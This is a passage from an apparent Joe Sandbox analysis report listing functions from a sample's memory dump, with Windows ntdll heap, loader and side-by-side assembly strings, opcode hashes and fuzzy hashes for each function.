                                                                            • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                            • API String ID: 0-861424205
                                                                            • Opcode ID: 85519d17f261fc5476e42ea7cc31834592dbad1890064698e924479c41b1b320
                                                                            • Instruction ID: b0ebb9370ba802481b32ec12aeffe92c7c8c60a73c66d6f9e105c3719bbff637
                                                                            • Opcode Fuzzy Hash: 85519d17f261fc5476e42ea7cc31834592dbad1890064698e924479c41b1b320
                                                                            • Instruction Fuzzy Hash: 18313736F40221B7FB258A998C49F5B7BADFB94A50F15405DFB04AF244D7709A01CBA2
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 015EC6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            • Loading import redirection DLL: '%wZ', xrefs: 01628170
                                                                            • LdrpInitializeProcess, xrefs: 015EC6C4
                                                                            • minkernel\ntdll\ldrredirect.c, xrefs: 01628181, 016281F5
                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 015EC6C3
                                                                            • Unable to build import redirection Table, Status = 0x%x, xrefs: 016281E5
                                                                            • LdrpInitializeImportRedirection, xrefs: 01628177, 016281EB
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                            • API String ID: 0-475462383
                                                                            • Opcode ID: 7ced5e5a3848819e503536c332526946b46f2fd496562e7c795a62fff1f1772c
                                                                            • Instruction ID: 6d7a2e787b6a450c2396fad9acf5acb4ee6b02b62794a8e73cb5fb10c6e7700c
                                                                            • Opcode Fuzzy Hash: 7ced5e5a3848819e503536c332526946b46f2fd496562e7c795a62fff1f1772c
                                                                            • Instruction Fuzzy Hash: 0131F1B16447139BC324EA2CDD4AE2ABBD5FFD4B10F00052CF944AF291D620EC04CBA2
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 015C9950 Relevance: 6.7, Strings: 5, Instructions: 462COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: $ $Internal error check failed$Status != STATUS_SXS_SECTION_NOT_FOUND$minkernel\ntdll\sxsisol.cpp
                                                                            • API String ID: 0-3393094623
                                                                            • Opcode ID: 5598731d7694735f2e26787546c0af470d5e0f9d731373456af148da3c32b47b
                                                                            • Instruction ID: fd23ba7f66ba73e211d3c67f4bc98547396ea2e168b5e48bf6d2dbbacc03d2df
                                                                            • Opcode Fuzzy Hash: 5598731d7694735f2e26787546c0af470d5e0f9d731373456af148da3c32b47b
                                                                            • Instruction Fuzzy Hash: D5025E75508382DFD721CFA8C4807AFBBE5BF85B08F44891EE9899B251D770D844CB92
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 015F096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 015F2DF0: LdrInitializeThunk.NTDLL ref: 015F2DFA
                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 015F0BA3
                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 015F0BB6
                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 015F0D60
                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 015F0D74
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 1404860816-0
                                                                            • Opcode ID: c2c7c75ff310cfe790f3d9758cabb1a1ced918a26a17061867bf613ff6dce403
                                                                            • Instruction ID: 1580be76159fbb22049e0d4280843d8b2b4b228af00713424b3425ccc8e9fd7c
                                                                            • Opcode Fuzzy Hash: c2c7c75ff310cfe790f3d9758cabb1a1ced918a26a17061867bf613ff6dce403
                                                                            • Instruction Fuzzy Hash: 54424B71900716DFDB21CF68C880BAAB7F5BF44314F1445ADEA89DB282D770A985CF60
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 01634F40 Relevance: 6.5, Strings: 5, Instructions: 246COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: .DLL$.Local$/$\$\microsoft.system.package.metadata\Application
                                                                            • API String ID: 0-2518169356
                                                                            • Opcode ID: 60e3cd7d7f05994fee2f6abb000960b25f4ebe044e3b8237a8fe0ab9d966bea9
                                                                            • Instruction ID: 77813ef5883f742fe2721772412a1d14fd2a54cbcbb476e5959791cf589a6534
                                                                            • Opcode Fuzzy Hash: 60e3cd7d7f05994fee2f6abb000960b25f4ebe044e3b8237a8fe0ab9d966bea9
                                                                            • Instruction Fuzzy Hash: CE917D7291061A9BCB21CF9CCC81AAEF7B1FF88310F594169E915EB350D775D901CB91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 015C70C0 Relevance: 6.0, Strings: 3, Instructions: 2248COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                            • API String ID: 0-3178619729
                                                                            • Opcode ID: 17bb81c4943b64678a7943b51138d06365d9d620b109b665edc738b5c283a31c
                                                                            • Instruction ID: eed046aaf8f97de8d3ec43e2adbbf3c49ed33e42b8d576a3eaffef0cfc673277
                                                                            • Opcode Fuzzy Hash: 17bb81c4943b64678a7943b51138d06365d9d620b109b665edc738b5c283a31c
                                                                            • Instruction Fuzzy Hash: 02139B70A006568FDB25CFA8C8807ADBBF2BF48B04F1485ADD949AF781D774A945CF90
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 015CA840 Relevance: 5.4, Strings: 4, Instructions: 358COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            • SXS: String hash table entry at %p has invalid key offset (= %ld) Header = %p; Index = %lu; Bucket = %p; Chain = %p, xrefs: 01617D39
                                                                            • SsHd, xrefs: 015CA885
                                                                            • SXS: String hash collision chain offset at %p (= %ld) out of bounds, xrefs: 01617D56
                                                                            • RtlpFindUnicodeStringInSection: Unsupported hash algorithm %lu found in string section., xrefs: 01617D03
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: RtlpFindUnicodeStringInSection: Unsupported hash algorithm %lu found in string section.$SXS: String hash collision chain offset at %p (= %ld) out of bounds$SXS: String hash table entry at %p has invalid key offset (= %ld) Header = %p; Index = %lu; Bucket = %p; Chain = %p$SsHd
                                                                            • API String ID: 0-2905229100
                                                                            • Opcode ID: 8f625232d3f40434254910014bb5855a3ec7d8e4d861ae6feb61f33473b146ec
                                                                            • Instruction ID: afaf7dc760d0a0962299d5945c384c50b16158763da8ecc3ea3c846f33e2ff78
                                                                            • Opcode Fuzzy Hash: 8f625232d3f40434254910014bb5855a3ec7d8e4d861ae6feb61f33473b146ec
                                                                            • Instruction Fuzzy Hash: 5CD19E36A0021A9FDB25CFA8D8C16EDBBB1FF48710F19405DE905AF355E371A881CBA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 015BA3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                            • API String ID: 0-379654539
                                                                            • Opcode ID: f49ce1918c5d9b9497d9cffbcfff449804435f849405f69b7eb083758b2e3ef4
                                                                            • Instruction ID: 6a7ed52ea4fa36bd5de95b59ea6036f826c93bf866e2abb80c5ac13306d68a48
                                                                            • Opcode Fuzzy Hash: f49ce1918c5d9b9497d9cffbcfff449804435f849405f69b7eb083758b2e3ef4
                                                                            • Instruction Fuzzy Hash: 8BC18A74508386CFD721CF58C480BAAB7E4BF84704F04496EF9958B395E778CA49CB52
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 015E8402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            • @, xrefs: 015E8591
                                                                            • LdrpInitializeProcess, xrefs: 015E8422
                                                                            • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 015E855E
                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 015E8421
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                            • API String ID: 0-1918872054
                                                                            • Opcode ID: 25649242eb3befa6b551e7f03c233291d68fc3350ef1d96adc8202f1fb34bdde
                                                                            • Instruction ID: 321556afd26e62967af92316a34e88462f03a91e74c37d60adf82c9d90051a77
                                                                            • Opcode Fuzzy Hash: 25649242eb3befa6b551e7f03c233291d68fc3350ef1d96adc8202f1fb34bdde
                                                                            • Instruction Fuzzy Hash: D1919EB1908746AFD721DF65CC84EAFBAE8FF84744F40496EFA859A150E730D904CB62
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 015C0C00 Relevance: 5.3, Strings: 4, Instructions: 260COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            • HEAP[%wZ]: , xrefs: 016154D1, 01615592
                                                                            • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 016155AE
                                                                            • HEAP: , xrefs: 016154E0, 016155A1
                                                                            • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 016154ED
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
                                                                            • API String ID: 0-1657114761
                                                                            • Opcode ID: 5dc22e5dd384acff231a2b8214368946fa5a2c3a7b6afc38ff9617b54f6a5133
                                                                            • Instruction ID: ca30ec5c10b90d86fdd0f5125861e25ec00703cda0a9f8f1fcfd91902964ee12
                                                                            • Opcode Fuzzy Hash: 5dc22e5dd384acff231a2b8214368946fa5a2c3a7b6afc38ff9617b54f6a5133
                                                                            • Instruction Fuzzy Hash: 33A1CE78600606DFD725CFA8C880BBAFBE1BF55B00F18856DE5968F686D730E845CB91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 015E273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            • .Local, xrefs: 015E28D8
                                                                            • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 016222B6
                                                                            • SXS: %s() passed the empty activation context, xrefs: 016221DE
                                                                            • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 016221D9, 016222B1
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                            • API String ID: 0-1239276146
                                                                            • Opcode ID: 32315c0842e08c9a9b56975d4652251870080a23c97d2083a72c40039e79a87b
                                                                            • Instruction ID: 814bad205633d02413e7afb8f3e09c147333f2a7048f1090e623dadc124b2822
                                                                            • Opcode Fuzzy Hash: 32315c0842e08c9a9b56975d4652251870080a23c97d2083a72c40039e79a87b
                                                                            • Instruction Fuzzy Hash: 7EA18B31D0122A9BDB28CF68CC88BA9B7F5BF59354F1545EAD908AB255D7309EC0CF90
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 015E4AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01623437
                                                                            • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01623456
                                                                            • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0162342A
                                                                            • RtlDeactivateActivationContext, xrefs: 01623425, 01623432, 01623451
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                            • API String ID: 0-1245972979
                                                                            • Opcode ID: 860a25ae98b12430f71ab4d948a88653aedf7be8e72ae16c56ee789fa682227d
                                                                            • Instruction ID: 2646a259b5728aafde55fd41579bbaa1ace8ae4c2853837c1a6d5c655bc3ae64
                                                                            • Opcode Fuzzy Hash: 860a25ae98b12430f71ab4d948a88653aedf7be8e72ae16c56ee789fa682227d
                                                                            • Instruction Fuzzy Hash: 91612132A11B229BDB26CF18CC45B2AB7E5BF84B20F1485ADE995DF340D734E811CB95
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 015B64AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01610FE5
                                                                            • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 016110AE
                                                                            • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0161106B
                                                                            • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01611028
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                            • API String ID: 0-1468400865
                                                                            • Opcode ID: 117e7c09d24b8b007fb525bb925c4f173ee0b57a7aab4360b3d646cc64ded5fc
                                                                            • Instruction ID: db0eff460fa64a500426478afc6c49b58dfb3a9d59fc082594189db1bc068c38
                                                                            • Opcode Fuzzy Hash: 117e7c09d24b8b007fb525bb925c4f173ee0b57a7aab4360b3d646cc64ded5fc
                                                                            • Instruction Fuzzy Hash: C471BEB19043069FCB21DF18C8C4B9B7BA9BF95764F440468F9488F28AD734D598CBD2
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 015D245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0161A992
                                                                            • apphelp.dll, xrefs: 015D2462
                                                                            • LdrpDynamicShimModule, xrefs: 0161A998
                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 0161A9A2
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                            • API String ID: 0-176724104
                                                                            • Opcode ID: c79690ac9d7f67623c503bd592e58a7a8c6a5a7de585efa02b709b3031a8b9d6
                                                                            • Instruction ID: e324f9470406532cb611e498001656171255d40ccbee3c7000a65fea178a5742
                                                                            • Opcode Fuzzy Hash: c79690ac9d7f67623c503bd592e58a7a8c6a5a7de585efa02b709b3031a8b9d6
                                                                            • Instruction Fuzzy Hash: 61312872610242EBDB319F9DDC81AAEBBB5FB84B10F5A441DE9016F349C770A891CF90
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 015C29A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            • HEAP[%wZ]: , xrefs: 015C3255
                                                                            • HEAP: , xrefs: 015C3264
                                                                            • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 015C327D
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                            • API String ID: 0-617086771
                                                                            • Opcode ID: 23852efa17797a0775a9380b53e81781be32988bdcb3306e4c9c037cba088939
                                                                            • Instruction ID: 2a525bcfd44264f3dc6baa0d86e77e5d10a068a3748af0de8f2c617764a63d12
                                                                            • Opcode Fuzzy Hash: 23852efa17797a0775a9380b53e81781be32988bdcb3306e4c9c037cba088939
                                                                            • Instruction Fuzzy Hash: 60929A71A042499FDB25CFA8C8447AEBBF1FF48B04F18849DE85AAB351D735A941CF50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 016402C0 Relevance: 4.4, Strings: 3, Instructions: 611COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: """"$MitigationAuditOptions$MitigationOptions
                                                                            • API String ID: 0-1670051934
                                                                            • Opcode ID: b2c4c9f293fe4d431fb47253647dbf2d74fca9aea69f89ce0116187eae8b602f
                                                                            • Instruction ID: 59d278b9ff6b283606ab6e076fe21af94827d0943c955cb3bb10a2fc902de9e2
                                                                            • Opcode Fuzzy Hash: b2c4c9f293fe4d431fb47253647dbf2d74fca9aea69f89ce0116187eae8b602f
                                                                            • Instruction Fuzzy Hash: E9228D72A087128FE724CF2DCD916AABBE1BBC4310F25892EF29A87750D771E505CB41
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 015C0770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                            • API String ID: 0-4253913091
                                                                            • Opcode ID: 34e88638f63fedd22245d8c4372dd3ae9ad51fa6210d66beed19057d877491c4
                                                                            • Instruction ID: 85be3d9d7b63eb84eece47814640c157f9d35cb196db64a3fc976d973f93e27d
                                                                            • Opcode Fuzzy Hash: 34e88638f63fedd22245d8c4372dd3ae9ad51fa6210d66beed19057d877491c4
                                                                            • Instruction Fuzzy Hash: F6F1CE35600606DFEB25CFA8C890BAAB7F5FF85704F1881ACE5169B385D734E981CB90
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 015B1460 Relevance: 4.1, Strings: 3, Instructions: 385COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            • HEAP[%wZ]: , xrefs: 015B1712
                                                                            • HEAP: , xrefs: 015B1596
                                                                            • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 015B1728
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                            • API String ID: 0-3178619729
                                                                            • Opcode ID: 158199b945ab2eac394261ca546996508f96ef66b9f759d364e5fe2b1d61a702
                                                                            • Instruction ID: 3c82aa4b955e3d7365cac817f671ab20a7ea00555256f5abc5f7be83a14e22e4
                                                                            • Opcode Fuzzy Hash: 158199b945ab2eac394261ca546996508f96ef66b9f759d364e5fe2b1d61a702
                                                                            • Instruction Fuzzy Hash: 15E1C230A04A459FDB69CF68D8E1ABABBF5BF44300F18885DE596CF286D734E941CB50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 015D6962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID: $@
                                                                            • API String ID: 2994545307-1077428164
                                                                            • Opcode ID: 939a46c0f228f552a799ef530f8e41ff0ff7fb9f84f0d20d0286d2c4a414bced
                                                                            • Instruction ID: 6ddf402bda3abcbbf32463b446da40dfa2caec7323bb8f9fbc113236d31a45b8
                                                                            • Opcode Fuzzy Hash: 939a46c0f228f552a799ef530f8e41ff0ff7fb9f84f0d20d0286d2c4a414bced
                                                                            • Instruction Fuzzy Hash: 1CC25D716083419FE735CF28C881BAFBBE5BF88754F04892DE9898B251D774D845CB92
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 015AA197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: FilterFullPath$UseFilter$\??\
                                                                            • API String ID: 0-2779062949
                                                                            • Opcode ID: ddd2a724b45f049bf3d20f6687a5feaac484e0ad4d775d54ea0cdb4a20046377
                                                                            • Instruction ID: edd8f599c83396be182ec56ebf2682aafd9d44ce6627ec6c35af8547836d3afe
                                                                            • Opcode Fuzzy Hash: ddd2a724b45f049bf3d20f6687a5feaac484e0ad4d775d54ea0cdb4a20046377
                                                                            • Instruction Fuzzy Hash: 0EA15F7191162A9BDB36DF68CC88BAEB7B8FF44700F1141E9E909AB250D7359E84CF50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 015D0BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            • LdrpCheckModule, xrefs: 0161A117
                                                                            • Failed to allocated memory for shimmed module list, xrefs: 0161A10F
                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 0161A121
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                            • API String ID: 0-161242083
                                                                            • Opcode ID: 4f7a2203057ddb9df6be9e572248d419fe548108c8e01d3028388eb04d4cda00
                                                                            • Instruction ID: d5ff4bf728e8fdf37ff6cd4fdbabec66104d44887005571a5361edffe10f439a
                                                                            • Opcode Fuzzy Hash: 4f7a2203057ddb9df6be9e572248d419fe548108c8e01d3028388eb04d4cda00
                                                                            • Instruction Fuzzy Hash: 4471AC71A00206DFDB25EFACCD81ABEB7F4FB84604F58446DE906AB395E734A941CB50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 015C0A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                            • API String ID: 0-1334570610
                                                                            • Opcode ID: 8d8a12552098ee892331719d1c7725ffbf915a5d0f99c73ae31240dbf20a2b58
                                                                            • Instruction ID: 6722131304a8d06bcfdcb509cf56552413bfd439e785355fec9a64b14454a1ae
                                                                            • Opcode Fuzzy Hash: 8d8a12552098ee892331719d1c7725ffbf915a5d0f99c73ae31240dbf20a2b58
